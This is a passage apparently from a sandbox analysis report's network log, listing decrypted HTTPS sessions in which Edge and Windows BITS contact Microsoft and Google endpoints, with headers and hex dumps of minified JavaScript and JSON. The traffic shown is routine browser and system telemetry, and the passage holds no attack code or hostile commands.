2024-07-26 18:10:22 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49795	23.96.180.189	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:21 UTC	616	OUT	GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1 Host: arc.msn.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:22 UTC	633	IN	HTTP/1.1 200 OK Cache-Control: max-age=86400, private Content-Length: 2061 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"X-RADID":"P425775005-T700421790-C128000000003081809"},{"BATCH_REDIRECT_STORE":"B128000000003081809+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Fri, 26 Jul 2024 18:10:21 GMT Connection: close
2024-07-26 18:10:22 UTC	2061	IN	Data Raw: 7b 22 66 22 3a 22 72 61 66 22 2c 22 76 22 3a 22 31 2e 30 22 2c 22 72 64 72 22 3a 5b 7b 22 63 22 3a 22 41 6e 61 68 65 69 6d 20 50 61 73 73 77 6f 72 64 20 4d 6f 6e 69 74 6f 72 22 2c 22 75 22 3a 22 43 6f 6e 73 65 6e 74 20 53 61 76 65 20 50 61 73 73 77 6f 72 64 22 7d 5d 2c 22 61 64 22 3a 7b 22 54 49 54 4c 45 5f 53 41 56 45 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 55 50 44 41 54 45 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 53 41 56 45 44 5f 50 41 53 53 57 4f 52 44 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 4e 4f 5f 53 41 56 45 44 5f 50 41 53 53 57 4f 52 44 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 Data Ascii: {"f":"raf","v":"1.0","rdr":[{"c":"Anaheim Password Monitor","u":"Consent Save Password"}],"ad":{"TITLE_SAVE":"Save your password","TITLE_UPDATE":"Save your password","TITLE_SAVED_PASSWORD":"Save your password","TITLE_NO_SAVED_PASSWORD":"Save your password

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49797	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:22 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-26 18:10:22 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0712) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=219206 Date: Fri, 26 Jul 2024 18:10:22 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49806	142.250.80.110	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:23 UTC	1080	OUT	GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-812259498&timestamp=1722017421427 HTTP/1.1 Host: accounts.youtube.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:23 UTC	1951	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://accounts.google.com Content-Security-Policy: frame-ancestors https://accounts.google.com Content-Security-Policy: script-src 'report-sample' 'nonce-KaxLnXGQTn66bOk8GKIP8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 18:10:23 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/AccountsDomainCookiesCheckConnectionHttp/web-reports?context=eJzj0tDikmJw0JBikPj6kkkDiJ3SZ7AGAXHSv_OsRUC8JOIi66HEi6xC3Bz9Z_u3sglMWDY9TkkvKb8wPjMlNa8ks6QyJT83MTMvOT8_OzO1uDi1qCy1KN7IwMjEwNzIUM_AIr7AAACufyXF" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 37 36 36 36 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4b 61 78 4c 6e 58 47 51 54 6e 36 36 62 4f 6b 38 47 4b 49 50 38 67 22 3e 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f Data Ascii: 7666<html><head><script nonce="KaxLnXGQTn66bOk8GKIP8g">"use strict";this.default_AccountsDomaincookiesCheckconnectionJs=this.default_AccountsDomaincookiesCheckconnectionJs\|\|{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeo
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 6e 64 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 20 69 6e 20 62 7d 29 5d 7c 7c 22 22 7d 7d 2c 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 0a 66 61 28 29 3b 69 66 28 61 3d 3d 3d 22 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 22 29 7b 69 66 28 6a 61 28 29 29 69 66 28 28 61 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 62 29 29 26 26 61 5b 31 5d 29 62 3d 61 5b 31 5d 3b 65 6c 73 65 7b 61 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 62 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 62 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 62 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 62 26 26 62 5b 31 5d 29 73 Data Ascii: nd(function(d){return d in b})]\|\|""}},qa=function(a){var b=fa();if(a==="Internet Explorer"){if(ja())if((a=/rv: ([\d\.])/.exec(b))&&a[1])b=a[1];else{a="";var c=/MSIE +([\d\.]+)/.exec(b);if(c&&c[1])if(b=/Trident\/(\d.\d)/.exec(b),c[1]=="7.0")if(b&&b[1])s
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 29 3b 7a 61 3d 76 6f 69 64 20 30 3b 69 66 28 61 3d 3d 6e 75 6c 6c 29 7b 76 61 72 20 64 3d 39 36 3b 63 3f 28 61 3d 5b 63 5d 2c 64 7c 3d 35 31 32 29 3a 61 3d 5b 5d 3b 62 26 26 28 64 3d 64 26 2d 31 36 37 36 30 38 33 33 7c 28 62 26 31 30 32 33 29 3c 3c 31 34 29 7d 65 6c 73 65 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6e 22 29 3b 64 3d 7a 28 61 29 3b 69 66 28 64 26 32 30 34 38 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6f 22 29 3b 69 66 28 64 26 0a 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 70 22 29 3b 61 3a 7b 63 3d 61 3b 76 61 72 20 65 3d 63 2e 6c 65 6e 67 74 68 3b 69 66 28 65 Data Ascii: );za=void 0;if(a==null){var d=96;c?(a=[c],d\|=512):a=[];b&&(d=d&-16760833\|(b&1023)<<14)}else{if(!Array.isArray(a))throw Error("n");d=z(a);if(d&2048)throw Error("o");if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error("p");a:{c=a;var e=c.length;if(e
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 30 3a 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 63 61 3b 76 61 72 20 65 3d 4b 61 28 63 3f 61 2e 43 3a 62 29 3b 69 66 28 61 3d 62 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 62 5b 61 2d 31 5d 2c 68 3d 77 61 28 66 29 3b 68 3f 61 2d 2d 3a 66 3d 76 6f 69 64 20 30 3b 65 3d 2b 21 21 28 65 26 35 31 32 29 2d 31 3b 76 61 72 20 67 3d 62 3b 69 66 28 68 29 7b 62 3a 7b 76 61 72 20 6b 3d 66 3b 76 61 72 20 6c 3d 7b 7d 3b 68 3d 21 31 3b 69 66 28 6b 29 66 6f 72 28 76 61 72 20 6d 20 69 6e 20 6b 29 69 66 28 69 73 4e 61 4e 28 2b 6d 29 29 6c 5b 6d 5d 3d 6b 5b 6d 5d 3b 65 6c 73 65 7b 76 61 72 20 71 3d 6b 5b 6d 5d 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 71 29 26 26 28 41 28 71 2c 64 2c 0a 2b 6d 29 7c 7c 76 61 28 71 29 26 26 71 2e 73 69 7a 65 3d 3d 3d 30 29 26 26 28 71 3d Data Ascii: 0:a.constructor.ca;var e=Ka(c?a.C:b);if(a=b.length){var f=b[a-1],h=wa(f);h?a--:f=void 0;e=+!!(e&512)-1;var g=b;if(h){b:{var k=f;var l={};h=!1;if(k)for(var m in k)if(isNaN(+m))l[m]=k[m];else{var q=k[m];Array.isArray(q)&&(A(q,d,+m)\|\|va(q)&&q.size===0)&&(q=
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 50 61 5b 62 5b 63 5d 5d 3b 74 79 70 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 45 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 51 61 28 4e 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 0a 76 61 72 20 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 Data Ascii: ngth;c++){var d=Pa[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&E(d.prototype,a,{configurable:!0,writable:!0,value:function(){return Qa(Na(this))}})}return a});var Qa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};re
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 69 66 28 21 63 28 6b 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 69 22 29 3b 64 28 6b 29 3b 69 66 28 21 48 28 6b 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6a 60 22 2b 6b 29 3b 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3d 6c 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 48 28 6b 2c 66 29 3f 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3a 76 6f 69 64 20 30 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 48 28 6b 2c 66 29 26 26 48 28 6b 5b 66 5d 2c 74 68 69 73 2e 67 29 7d 3b 67 2e 70 Data Ascii: prototype.set=function(k,l){if(!c(k))throw Error("i");d(k);if(!H(k,f))throw Error("j`"+k);k[f][this.g]=l;return this};g.prototype.get=function(k){return c(k)&&H(k,f)?k[f][this.g]:void 0};g.prototype.has=function(k){return c(k)&&H(k,f)&&H(k[f],this.g)};g.p
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 2e 68 61 73 28 6b 29 3f 6c 3d 62 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6d 3d 67 5b 30 5d 5b 6c 5d 3b 69 66 28 6d 26 26 48 28 67 5b 30 5d 2c 6c 29 29 66 6f 72 28 67 3d 30 3b 67 3c 6d 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 7b 76 61 72 20 71 3d 6d 5b 67 5d 3b 69 66 28 6b 21 3d 3d 6b 26 26 71 2e 6b 65 79 21 3d 3d 71 2e 6b 65 79 7c 7c 6b 3d 3d 3d 71 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6c 2c 6c 69 73 74 3a 6d 2c 69 6e 64 65 Data Ascii: totype.entries;var d=function(g,k){var l=k&&typeof k;l=="object"\|\|l=="function"?b.has(k)?l=b.get(k):(l=""+ ++h,b.set(k,l)):l="p_"+k;var m=g[0][l];if(m&&H(g[0],l))for(g=0;g<m.length;g++){var q=m[g];if(k!==k&&q.key!==q.key\|\|k===q.key)return{id:l,list:m,inde
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 61 72 20 68 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 66 2e 76 61 6c 75 65 2c 68 2b 2b 29 29 7d 65 6c 73 65 20 66 6f 72 28 66 3d 62 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 66 3b 68 2b 2b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 62 5b 68 5d 2c 68 29 29 3b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 76 61 72 20 5a 61 3d 5a 61 7c 7c 7b 7d 2c 72 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 24 61 28 22 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 2e 6f 78 4e 33 6e 62 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 49 3d 72 2e 5f 46 5f 74 6f 67 67 6c 65 73 7c 7c 5b 5d 2c 24 Data Ascii: ar h=0;!(f=b.next()).done;)e.push(c.call(d,f.value,h++))}else for(f=b.length,h=0;h<f;h++)e.push(c.call(d,b[h],h));return e}});var Za=Za\|\|{},r=this\|\|self,ab=function(a,b){var c=$a("WIZ_global_data.oxN3nb");a=c&&c[a];return a!=null?a:b},I=r._F_toggles\|\|[],$
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 66 20 69 6e 20 65 26 26 62 2e 63 61 6c 6c 28 63 2c 65 5b 66 5d 2c 66 2c 61 29 7d 3b 76 61 72 20 63 61 3d 22 63 6f 6e 73 74 72 75 63 74 6f 72 20 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 20 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 20 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 20 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 20 74 6f 53 74 72 69 6e 67 20 76 61 6c 75 65 4f 66 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 76 61 72 20 6a 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 3d 63 7c 7c 72 3b 76 61 72 20 64 3d 63 2e 6f 6e 65 72 72 6f 72 2c 65 3d 21 21 62 3b 63 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 Data Ascii: ypeof a==="string"?a.split(""):a,f=0;f<d;f++)f in e&&b.call(c,e[f],f,a)};var ca="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" ");var jb=function(a,b,c){c=c\|\|r;var d=c.onerror,e=!!b;c.onerror=functi
2024-07-26 18:10:23 UTC	1951	IN	Data Raw: 6d 65 6e 74 73 2c 65 3d 30 3b 64 26 26 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 65 3e 30 26 26 63 2e 70 75 73 68 28 22 2c 20 22 29 3b 76 61 72 20 66 3d 64 5b 65 5d 3b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 66 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 66 3d 66 3f 22 6f 62 6a 65 63 74 22 3a 22 6e 75 6c 6c 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a 62 72 65 61 6b 3b 63 61 73 65 20 22 6e 75 6d 62 65 72 22 3a 66 3d 53 74 72 69 6e 67 28 66 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 62 6f 6f 6c 65 61 6e 22 3a 66 3d 66 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 66 3d 28 66 3d 6c 62 28 66 29 29 3f 66 3a 22 5b 66 6e 5d 22 3b 62 72 65 61 6b 3b 64 65 66 61 75 Data Ascii: ments,e=0;d&&e<d.length;e++){e>0&&c.push(", ");var f=d[e];switch(typeof f){case "object":f=f?"object":"null";break;case "string":break;case "number":f=String(f);break;case "boolean":f=f?"true":"false";break;case "function":f=(f=lb(f))?f:"[fn]";break;defau

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49807	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:23 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-26 18:10:23 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=205481 Date: Fri, 26 Jul 2024 18:10:23 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-26 18:10:23 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49810	142.251.40.206	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:23 UTC	561	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:23 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:23 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49809	142.251.40.206	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:23 UTC	561	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:23 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:23 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49816	142.251.32.100	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
